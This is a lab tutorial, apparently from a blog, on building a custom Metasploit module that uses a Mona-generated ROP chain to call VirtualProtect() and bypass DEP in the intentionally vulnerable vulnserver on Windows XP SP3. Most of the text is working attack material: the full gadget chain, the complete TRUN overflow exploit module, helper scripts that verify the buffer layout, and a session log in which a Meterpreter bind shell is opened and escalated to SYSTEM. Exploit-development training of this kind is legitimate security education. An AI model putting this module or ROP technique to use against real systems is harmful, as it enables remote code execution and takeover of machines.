Custom Metasploit module to bypass DEP
Note: for the underlying theory, see the book listed in the references.
I. Lab environment
Attacker: Kali 2019.3
Target: Windows XP SP3 (English). XP defaults to OptIn DEP, which only covers Windows system binaries; for this test DEP has to be set to OptOut or AlwaysOn so that vulnserver.exe is actually covered, otherwise a plain jmp esp exploit would already succeed and the ROP chain would prove nothing.
Vulnerable program: vulnserver.exe (download: https://github.com/stephenbradshaw/vulnserver)
II. Running the Mona script
1. Find every DLL that gets loaded
(1) On the target, open a command prompt in the directory containing vulnserver.exe and start it on the port the module will connect to:
vulnserver.exe 9999
(2) Query the process from Immunity Debugger
- Attach to vulnserver.exe and run !mona modules; this lists every loaded module with its base address and protection flags.
- That alone is not enough to build a ROP chain: we still need to locate usable gadgets (short instruction sequences ending in RETN) inside those DLLs. On XP SP3 there is no ASLR, so the addresses found here stay valid across reboots.
2. msfrop can also find gadgets (supplementary)
msfrop command (msvcrt.dll as the example)
msf5 > msfrop -v -s "pop cex" /root/Desktop/msvcrt.dll    # -s searches for a pattern, -v prints each gadget in full
[*] exec: msfrop -v -s "pop cex" /root/Desktop/msvcrt.dll

Collecting gadgets from /root/Desktop/msvcrt.dll
Found 2320 gadgets
/root/Desktop/msvcrt.dll gadget: 0x77c11285
0x77c11285: add [eax], al
0x77c11287: add bl, cl
0x77c11289: dec ebp
0x77c1128a: ret

/root/Desktop/msvcrt.dll gadget: 0x77c112a9
0x77c112a9: mov eax, 0f88a77c3h
0x77c112ae: ret
…………
3. Use Mona to find gadgets and build the ROP chain
The Mona script inside Immunity Debugger does not just find gadgets; it can assemble the whole chain.
The command !mona rop -m *.dll -cp nonull searches every loaded module for gadgets and keeps only pointers that contain no null byte (the bad character declared in the module).
The generated rop_chains.txt contains complete, ready-to-use chains; the VirtualProtect() one is copied into the exploit module as is.
The register setup the chain must reach before PUSHAD in order to call VirtualProtect() (as listed in rop_chains.txt):
Register setup for VirtualProtect() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
--- alternative chain ---
 EAX = ptr to &VirtualProtect()
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
The generated chain:
def create_rop_chain()
  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets = [
    #[---INFO:gadgets_to_set_esi:---]
    0x77c2d7ba,  # POP ECX # RETN [msvcrt.dll]
    0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]
    0x7e41927f,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]
    0x7c94d192,  # XCHG EAX,ESI # RETN [ntdll.dll]
    #[---INFO:gadgets_to_set_ebp:---]
    0x77c42f04,  # POP EBP # RETN [msvcrt.dll]
    0x625011c7,  # & jmp esp [essfunc.dll]
    #[---INFO:gadgets_to_set_ebx:---]
    0x77c4e0da,  # POP EAX # RETN [msvcrt.dll]
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x7e44493b,  # NEG EAX # RETN [USER32.dll]
    0x77f301e4,  # XCHG EAX,EBX # RETN [GDI32.dll]
    #[---INFO:gadgets_to_set_edx:---]
    0x7c87f229,  # POP EAX # RETN [kernel32.dll]
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x77eda3d7,  # NEG EAX # RETN [RPCRT4.dll]
    0x77c58fbc,  # XCHG EAX,EDX # RETN [msvcrt.dll]
    #[---INFO:gadgets_to_set_ecx:---]
    0x77c1f519,  # POP ECX # RETN [msvcrt.dll]
    0x62504d79,  # &Writable location [essfunc.dll]
    #[---INFO:gadgets_to_set_edi:---]
    0x77c46116,  # POP EDI # RETN [msvcrt.dll]
    0x77e8d224,  # RETN (ROP NOP) [RPCRT4.dll]
    #[---INFO:gadgets_to_set_eax:---]
    0x77ead9ed,  # POP EAX # RETN [RPCRT4.dll]
    0x90909090,  # nop
    #[---INFO:pushad:---]
    0x77dfc5ee,  # PUSHAD # RETN [ADVAPI32.dll]
  ].flatten.pack("V*")
  return rop_gadgets
end
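The following is an added example, not code from the original post or from Mona. It models what the chain above hands to VirtualProtect() at the moment PUSHAD # RETN executes, and shows why dwSize and NewProtect are loaded through NEG rather than popped directly. The gadget addresses are the ones listed above; the ESI and ESP values passed in at the bottom are hypothetical, because the IAT contents and the stack address are only known at run time.

```ruby
# Added example (not part of the original post): what the Mona chain above
# hands to VirtualProtect() when PUSHAD # RETN runs.

# Gadget addresses copied from the chain above (XP SP3 English, no ASLR).
ROP_CHAIN = [
  0x77c2d7ba, 0x6250609c, 0x7e41927f, 0x7c94d192,  # ESI = *(IAT &VirtualProtect)
  0x77c42f04, 0x625011c7,                          # EBP = &jmp esp
  0x77c4e0da, 0xfffffdff, 0x7e44493b, 0x77f301e4,  # EBX = -0xfffffdff = 0x201 (dwSize)
  0x7c87f229, 0xffffffc0, 0x77eda3d7, 0x77c58fbc,  # EDX = -0xffffffc0 = 0x40 (PAGE_EXECUTE_READWRITE)
  0x77c1f519, 0x62504d79,                          # ECX = writable dword (lpflOldProtect)
  0x77c46116, 0x77e8d224,                          # EDI = RETN (ROP NOP)
  0x77ead9ed, 0x90909090,                          # EAX = 0x90909090
  0x77dfc5ee                                       # PUSHAD # RETN
].freeze

# 32-bit two's-complement negation, i.e. what the NEG EAX gadget computes.
def neg32(v)
  (-v) & 0xffffffff
end

# Does the little-endian encoding of this dword contain a bad byte?
def bad_dword?(dword, badchars = "\x00".b)
  ([dword].pack('V').bytes & badchars.bytes).any?
end

# Dwords that could not survive in the request; this is what Mona's
# "-cp nonull" filters out of the gadget pool.
def chain_badchars(chain, badchars = "\x00".b)
  chain.select { |d| bad_dword?(d, badchars) }
end

# Register state right before PUSHAD. ESI holds whatever the IAT slot
# contained and ESP is the run-time stack pointer, so both are passed in.
def regs_before_pushad(esi:, esp:)
  { eax: 0x90909090, ecx: 0x62504d79, edx: neg32(0xffffffc0), ebx: neg32(0xfffffdff),
    esp: esp, ebp: 0x625011c7, esi: esi, edi: 0x77e8d224 }
end

# PUSHAD pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI in that order, so read
# upward from the new ESP the stack holds EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX.
def pushad_frame(regs)
  %i[edi esi ebp esp ebx edx ecx eax].map { |r| regs.fetch(r) }
end

# The RETN after PUSHAD consumes EDI (the ROP NOP) and lands in ESI
# (VirtualProtect), which sees EBP as its return address followed by its four
# stdcall arguments. Its "ret 0x10" leaves ESP on the EAX slot; EBP's jmp esp
# then executes 0x90909090 and runs straight into the NOPs and payload that
# the module places right after the chain.
def virtualprotect_call(frame)
  edi, esi, ebp, esp, ebx, edx, ecx, eax = frame
  { rop_nop: edi, callee: esi, return_to: ebp,
    lpAddress: esp, dwSize: ebx, flNewProtect: edx, lpflOldProtect: ecx,
    first_bytes_after_jmp_esp: eax }
end

if __FILE__ == $0
  # Hypothetical run-time values (not taken from the page).
  regs = regs_before_pushad(esi: 0x7c801ad4, esp: 0x00c7f9f8)
  p chain_badchars(ROP_CHAIN)             # no gadget or constant carries a null byte
  p [bad_dword?(0x201), bad_dword?(0x40)] # the raw values would, hence NEG
  p virtualprotect_call(pushad_frame(regs))
end
```

The point worth checking here is lpAddress: it is the ESP that PUSHAD saved, which points at the slot directly after the PUSHAD gadget, so the 0x201-byte region that becomes executable starts exactly at the NOP sled the module appends.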
III. Writing the Metasploit exploit module that bypasses DEP
1. Exploit code
class MetasploitModule < Msf::Exploit::Remote  # msftidy only recognises the super class with whitespace on both sides of '<'
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DEP Bypass Exploit',
      'Description'    => %q{
        DEP Bypass Using ROP Chains Example Module
      },
      'Platform'       => 'Windows',
      'Author'         => ['z9m8r8'],
      'Payload'        => {
        'Space'    => 312,    # the framework reads 'Space' (capital S); a lowercase 'space' key is ignored
        'BadChars' => "\x00"
      },
      'Targets'        => [
        ['Windows XP', { 'Offset' => 2006 }]
      ],
      'DisclosureDate' => '2021-09-26'))

    register_options(
      [
        Opt::RPORT(9999)
      ], self.class)
  end

  def create_rop_chain()
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      #[---INFO:gadgets_to_set_esi:---]
      0x77c2d7ba,  # POP ECX # RETN [msvcrt.dll]
      0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]
      0x7e41927f,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]
      0x7c94d192,  # XCHG EAX,ESI # RETN [ntdll.dll]
      #[---INFO:gadgets_to_set_ebp:---]
      0x77c42f04,  # POP EBP # RETN [msvcrt.dll]
      0x625011c7,  # & jmp esp [essfunc.dll]
      #[---INFO:gadgets_to_set_ebx:---]
      0x77c4e0da,  # POP EAX # RETN [msvcrt.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x7e44493b,  # NEG EAX # RETN [USER32.dll]
      0x77f301e4,  # XCHG EAX,EBX # RETN [GDI32.dll]
      #[---INFO:gadgets_to_set_edx:---]
      0x7c87f229,  # POP EAX # RETN [kernel32.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x77eda3d7,  # NEG EAX # RETN [RPCRT4.dll]
      0x77c58fbc,  # XCHG EAX,EDX # RETN [msvcrt.dll]
      #[---INFO:gadgets_to_set_ecx:---]
      0x77c1f519,  # POP ECX # RETN [msvcrt.dll]
      0x62504d79,  # &Writable location [essfunc.dll]
      #[---INFO:gadgets_to_set_edi:---]
      0x77c46116,  # POP EDI # RETN [msvcrt.dll]
      0x77e8d224,  # RETN (ROP NOP) [RPCRT4.dll]
      #[---INFO:gadgets_to_set_eax:---]
      0x77ead9ed,  # POP EAX # RETN [RPCRT4.dll]
      0x90909090,  # nop
      #[---INFO:pushad:---]
      0x77dfc5ee,  # PUSHAD # RETN [ADVAPI32.dll]
    ].flatten.pack("V*")
    return rop_gadgets
  end

  def exploit
    connect
    rop_chain = create_rop_chain()
    # 2006 bytes of filler up to the saved return address; the first gadget lands in EIP
    junk = rand_text_alpha_upper(target['Offset'])
    # the terminator must be double-quoted: '\r\n' in Ruby is the four literal characters \ r \ n, not CRLF
    buf = "TRUN ." + junk + rop_chain + make_nops(16) + payload.encoded + "\r\n"
    sock.put(buf)
    handler
    disconnect
  end
end
2. Where the module is saved
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test# ls
dep_attack_by_z9m8r8.rb  seh_attack_by_z9m8r8.rb
3. Walkthrough
The exploit method
- The create_rop_chain function that Mona wrote to rop_chains.txt is copied into the module unchanged.
- create_rop_chain is called and the packed chain is kept in the rop_chain variable.
- rand_text_alpha_upper(target['Offset']) produces 2006 random uppercase letters, stored in junk; this is the filler that reaches the saved return address.
- buf is built from the TRUN command, the 2006-byte junk and rop_chain, so the first dword of the chain (POP ECX # RETN) overwrites EIP and the remaining gadgets sit on the stack where the successive RETNs consume them.
- 16 NOPs and the encoded payload are appended and the request is terminated with CRLF. Once the chain has called VirtualProtect() on that region, the jmp esp gadget transfers execution into the NOPs and from there into the shellcode. payload.encoded is already filtered against BadChars by the framework; the chain and the NOPs are not, so they are the bytes to check for nulls.
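To see the layout concretely, here is an added example that is not the module's own code: it assembles the same TRUN request offline, with a stand-in for rand_text_alpha_upper (alpha_upper, a name chosen here), a constructed two-gadget chain and a 20-byte INT3 stand-in for the payload, and then runs the checks a practitioner wants before sending anything: the first gadget sits at the EIP slot, the chain is contiguous, nothing before the CRLF contains the bad char, the payload fits the declared Space, and the request really ends in CRLF.

```ruby
# Added example (not from the original module): build the TRUN request offline
# and check its layout before it goes on the wire.
require 'securerandom'

TRUN_PREFIX   = 'TRUN .'.b
EIP_OFFSET    = 2006        # 'Offset' from the module's target
PAYLOAD_SPACE = 312         # 'Space' from the module's payload hash
BADCHARS      = "\x00".b    # 'BadChars' from the module

# Stand-in for rand_text_alpha_upper: only A-Z, so the filler carries no bad chars.
def alpha_upper(n)
  Array.new(n) { (65 + SecureRandom.random_number(26)).chr }.join
end

# Same layout as the module's exploit method: prefix, filler up to the saved
# return address, ROP chain, 16 NOPs, payload, CRLF.
def build_trun_buffer(rop_chain, shellcode, offset: EIP_OFFSET, nops: 16)
  if shellcode.bytesize > PAYLOAD_SPACE
    raise ArgumentError, "payload is #{shellcode.bytesize} bytes, Space allows #{PAYLOAD_SPACE}"
  end
  TRUN_PREFIX + alpha_upper(offset).b + rop_chain.b + ("\x90".b * nops) + shellcode.b + "\r\n".b
end

# Pre-flight checks. crlf_ok is false for the single-quoted '\r\n' mistake,
# because that appends the literal characters \ r \ n instead of CRLF.
def check_layout(buf, rop_chain, offset: EIP_OFFSET)
  eip_pos = TRUN_PREFIX.bytesize + offset
  body = buf.byteslice(0, buf.bytesize - 2)
  {
    eip_pos:        eip_pos,
    eip_value:      buf.byteslice(eip_pos, 4).unpack1('V'),
    chain_in_place: buf.byteslice(eip_pos, rop_chain.bytesize) == rop_chain.b,
    badchar_found:  body.bytes.any? { |b| BADCHARS.bytes.include?(b) },
    crlf_ok:        buf.end_with?("\r\n".b),
    total_length:   buf.bytesize
  }
end

if __FILE__ == $0
  # Constructed sample: the first two gadgets of the chain above and INT3s as the payload.
  chain = [0x77c2d7ba, 0x6250609c].pack('V*')
  buf = build_trun_buffer(chain, "\xcc".b * 20)
  p check_layout(buf, chain)
  # the buggy terminator: the same buffer with '\r\n' (single quotes) fails crlf_ok
  p check_layout(buf.byteslice(0, buf.bytesize - 2) + '\r\n'.b, chain)[:crlf_ok]
end
```

Replace the constructed chain with the full create_rop_chain output and the INT3s with a real payload and the same checks apply; a payload larger than Space raises before anything is sent, which is the failure the module's 'Space' key is meant to prevent at generation time.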
4. Linting with msftidy
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test# ../../../../tools/dev/msftidy.rb dep_attack_by_z9m8r8.rb
dep_attack_by_z9m8r8.rb - [INFO] No CVE references found. Please check before you land!
dep_attack_by_z9m8r8.rb - [ERROR] Unable to determine super class    # unresolved (I went over super() several times and found nothing wrong), but the exploit still succeeds in msf!
dep_attack_by_z9m8r8.rb:19 - [WARNING] Spaces at EOL
IV. Running it in msf
msf5 > use exploit/windows/z9m8r8_test/dep_attack_by_z9m8r8
msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > show options

Module options (exploit/windows/z9m8r8_test/dep_attack_by_z9m8r8):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   9999             yes       The target port (TCP)

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows XP

msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > set rhost 10.10.10.131
rhost => 10.10.10.131
msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > exploit

[*] Started bind TCP handler against 10.10.10.131:4444
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 1 opened (10.10.10.149:40241 -> 10.10.10.131:4444) at 2021-09-26 07:06:01 -0400

meterpreter > getuid
Server username: DH-CA8822AB9589\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
V. References
《精通Metasploit渗透测试》 (the Chinese edition of Mastering Metasploit)